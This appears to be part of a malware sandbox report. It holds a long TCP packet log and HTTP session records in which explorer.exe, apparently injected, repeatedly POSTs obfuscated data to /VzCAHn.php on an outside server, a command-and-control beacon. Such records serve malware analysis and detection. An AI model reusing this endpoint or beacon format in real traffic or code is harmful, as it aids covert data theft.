                                                                                                                                                                                                Dec 13, 2024 08:22:28.418859959 CET5019380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:28.433949947 CET8050192185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:28.538814068 CET8050193185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:28.538933039 CET5019380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:28.539021969 CET5019380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:28.658981085 CET8050193185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:28.659132004 CET5019380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:28.778938055 CET8050193185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:29.169118881 CET5019080192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:29.169442892 CET5019480192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:29.289657116 CET8050194185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:29.289691925 CET8050190185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:29.289807081 CET5019080192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:29.289818048 CET5019480192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:29.295838118 CET5019180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:29.296173096 CET5019580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:29.296267986 CET5019480192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:29.416256905 CET8050191185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:29.416304111 CET8050195185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:29.416335106 CET8050194185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:29.416358948 CET5019180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:29.416426897 CET5019580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:29.418045044 CET5019580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:29.539961100 CET8050195185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:30.152312994 CET8050193185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:30.152364016 CET8050193185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:30.152426004 CET5019380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:30.157269001 CET5019380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:30.262751102 CET5019680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:30.277157068 CET8050193185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:30.382775068 CET8050196185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:30.382889986 CET5019680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:30.382977962 CET5019680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:30.503459930 CET8050196185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:30.503707886 CET5019680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:30.623744965 CET8050196185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:30.646424055 CET8050194185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:30.646658897 CET5019480192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:30.784956932 CET8050195185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:30.785079956 CET5019580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:31.907249928 CET8050196185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:31.907321930 CET8050196185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:31.907402039 CET5019680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:31.908740997 CET5019680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:32.012638092 CET5019780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:32.028459072 CET8050196185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:32.132678986 CET8050197185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:32.132802010 CET5019780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:32.132873058 CET5019780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:32.252701998 CET8050197185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:32.252841949 CET5019780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:32.372790098 CET8050197185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:32.450620890 CET5019480192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:32.451031923 CET5019880192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:32.559654951 CET5019580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:32.559935093 CET5019980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:32.571579933 CET8050198185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:32.571702957 CET5019880192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:32.571707964 CET8050194185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:32.571768045 CET5019480192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:32.599850893 CET5019880192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:32.679735899 CET8050199185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:32.679836988 CET8050195185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:32.679883957 CET5019980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:32.679914951 CET5019580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:32.694523096 CET5019980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:32.719775915 CET8050198185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:32.814289093 CET8050199185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:33.591042042 CET8050197185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:33.591284037 CET8050197185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:33.591382027 CET5019780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:33.619153976 CET5019780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:33.734551907 CET5020080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:33.739010096 CET8050197185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:33.854444981 CET8050200185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:33.854538918 CET5020080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:33.854614973 CET5020080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:33.909085035 CET8050198185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:33.909182072 CET5019880192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:33.974375010 CET8050200185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:33.974440098 CET5020080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:34.050211906 CET8050199185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:34.050270081 CET5019980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:34.094352961 CET8050200185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:35.478657007 CET8050200185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:35.478676081 CET8050200185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:35.478745937 CET5020080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:35.480063915 CET5020080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:35.509355068 CET5019880192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:35.509645939 CET5020180192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:35.590735912 CET5020280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:35.600069046 CET8050200185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:35.629390955 CET8050201185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:35.630779982 CET8050198185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:35.630965948 CET5019880192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:35.631309986 CET5020180192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:35.631544113 CET5019980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:35.631716967 CET5020180192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:35.631874084 CET5020380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:35.710556030 CET8050202185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:35.711287975 CET5020280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:35.711349964 CET5020280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:35.751836061 CET8050201185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:35.752108097 CET8050203185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:35.752222061 CET5020380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:35.752419949 CET8050199185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:35.752480030 CET5019980192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:35.770097017 CET5020380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:35.831403971 CET8050202185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:35.831473112 CET5020280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:35.892395973 CET8050203185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:35.952003002 CET8050202185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:37.002163887 CET8050201185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:37.002260923 CET5020180192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:37.112566948 CET8050203185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:37.112935066 CET5020380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:37.160969019 CET8050202185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:37.161065102 CET8050202185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:37.161139965 CET5020280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:37.162410975 CET5020280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:37.278384924 CET5020480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:37.282119989 CET8050202185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:37.398674011 CET8050204185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:37.398787975 CET5020480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:37.398993969 CET5020480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:37.518855095 CET8050204185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:37.518945932 CET5020480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:37.638736010 CET8050204185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:38.686886072 CET5020180192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:38.698688030 CET5020580192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:38.807504892 CET8050201185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:38.807631016 CET5020180192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:38.818367004 CET8050205185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:38.818509102 CET5020580192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:38.821105957 CET5020580192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:38.831624985 CET5020380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:38.831890106 CET5020680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:38.940792084 CET8050205185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:38.951694965 CET8050206185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:38.951788902 CET5020680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:38.951945066 CET8050203185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:38.951992989 CET5020380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:38.952864885 CET5020680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:39.024214029 CET8050204185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:39.024338961 CET8050204185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:39.024457932 CET5020480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:39.025738001 CET5020480192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:39.072571039 CET8050206185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:39.137968063 CET5020780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:39.145489931 CET8050204185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:39.257987022 CET8050207185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:39.258083105 CET5020780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:39.258141994 CET5020780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:39.378222942 CET8050207185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:39.378328085 CET5020780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:39.498210907 CET8050207185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:40.159301043 CET8050205185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:40.159408092 CET5020580192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:40.298496962 CET8050206185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:40.298608065 CET5020680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:40.697144032 CET8050207185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:40.697249889 CET8050207185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:40.697681904 CET5020780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:40.698638916 CET5020780192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:40.809464931 CET5020880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:40.818517923 CET8050207185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:40.929240942 CET8050208185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:40.929378986 CET5020880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:40.929456949 CET5020880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:41.049144030 CET8050208185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:41.049211025 CET5020880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:41.168920994 CET8050208185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:41.826925039 CET5020580192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:41.827239990 CET5020980192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:41.911437035 CET5020680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:41.911617994 CET5021080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:41.947065115 CET8050209185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:41.947170973 CET8050205185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:41.947338104 CET5020580192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:41.947351933 CET5020980192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:41.967394114 CET5020980192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:42.031464100 CET8050210185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:42.031558037 CET5021080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:42.031728983 CET8050206185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:42.031790972 CET5020680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:42.053854942 CET5021080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:42.087991953 CET8050209185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:42.174217939 CET8050210185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:42.541749954 CET8050208185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:42.541843891 CET8050208185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:42.541891098 CET5020880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:42.543215990 CET5020880192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:42.653306961 CET5021180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:42.662933111 CET8050208185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:42.773061991 CET8050211185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:42.773323059 CET5021180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:42.773323059 CET5021180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:42.893110037 CET8050211185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:42.893209934 CET5021180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:43.012924910 CET8050211185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:43.300067902 CET8050209185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:43.300199032 CET5020980192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:43.381208897 CET8050210185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:43.381314039 CET5021080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:44.205303907 CET8050211185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:44.205455065 CET8050211185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:44.205532074 CET5021180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:44.597079992 CET5021180192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:44.716901064 CET8050211185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:44.720405102 CET5021280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:44.840209007 CET8050212185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:44.840286016 CET5021280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:44.840430021 CET5021280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:44.960037947 CET8050212185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:44.960093021 CET5021280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:45.079926014 CET8050212185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:45.136149883 CET5021080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:45.136729002 CET5021380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:45.136825085 CET5020980192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:45.137175083 CET5021480192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:45.256282091 CET8050210185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:45.256360054 CET5021080192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:45.256402016 CET8050213185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:45.256798029 CET8050209185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:45.256844997 CET5020980192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:45.256861925 CET8050214185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:45.256910086 CET5021480192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:45.257021904 CET5021380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:45.263246059 CET5021380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:45.265018940 CET5021480192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:45.383069038 CET8050213185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:45.384660006 CET8050214185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:46.463591099 CET8050212185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:46.463793993 CET8050212185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:46.463872910 CET5021280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:46.465112925 CET5021280192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:46.575172901 CET5021580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:46.584845066 CET8050212185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:46.600662947 CET8050214185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:46.600749016 CET5021480192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:46.600758076 CET8050213185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:46.600809097 CET5021380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:46.695174932 CET8050215185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:46.695245981 CET5021580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:46.695322990 CET5021580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:46.815141916 CET8050215185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:46.815222979 CET5021580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:46.935075045 CET8050215185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:48.136921883 CET8050215185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:48.137109995 CET8050215185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:48.137176991 CET5021580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:22:51.600579023 CET8050214185.81.68.148192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:51.600728035 CET5021480192.168.2.11185.81.68.148
                                                                                                                                                                                                Dec 13, 2024 08:22:51.610503912 CET8050213185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:22:51.610577106 CET5021380192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:23:11.921957016 CET5021580192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:23:12.041951895 CET8050215185.81.68.147192.168.2.11
                                                                                                                                                                                                • 185.81.68.147
                                                                                                                                                                                                • 185.81.68.148
                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                0192.168.2.1149713185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:18:43.347393990 CET259OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Dec 13, 2024 08:18:44.675121069 CET257INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:18:44 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 40
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                Data Raw: 34 63 36 62 64 38 65 65 31 31 63 63 30 30 33 63 36 66 65 64 39 35 31 36 65 38 36 33 62 39 62 65 62 34 65 32 33 66 32 34
                                                                                                                                                                                                Data Ascii: 4c6bd8ee11cc003c6fed9516e863b9beb4e23f24


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                1192.168.2.1149714185.81.68.147802592C:\Windows\explorer.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                Dec 13, 2024 08:18:44.817557096 CET279OUTPOST /VzCAHn.php?A629855EB2A22925382193 HTTP/1.1
                                                                                                                                                                                                Host: 185.81.68.147
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Content-type: text/html
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.3
                                                                                                                                                                                                Content-Length: 35
                                                                                                                                                                                                Dec 13, 2024 08:18:44.937910080 CET35OUTData Raw: 56 0c 42 1e 56 16 56 19 00 01 1f 53 4c 00 4f 53 4a 32 2a 30 6d 7c 1c 66 26 44 42 5c 16 4d 0b 19 53 48 5d
                                                                                                                                                                                                Data Ascii: VBVVSLOSJ2*0m|f&DB\MSH]
                                                                                                                                                                                                Dec 13, 2024 08:18:46.251863956 CET216INHTTP/1.1 200 OK
                                                                                                                                                                                                Date: Fri, 13 Dec 2024 15:18:45 GMT
                                                                                                                                                                                                Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                                                                                                                                                                                X-Powered-By: PHP/8.2.12
                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
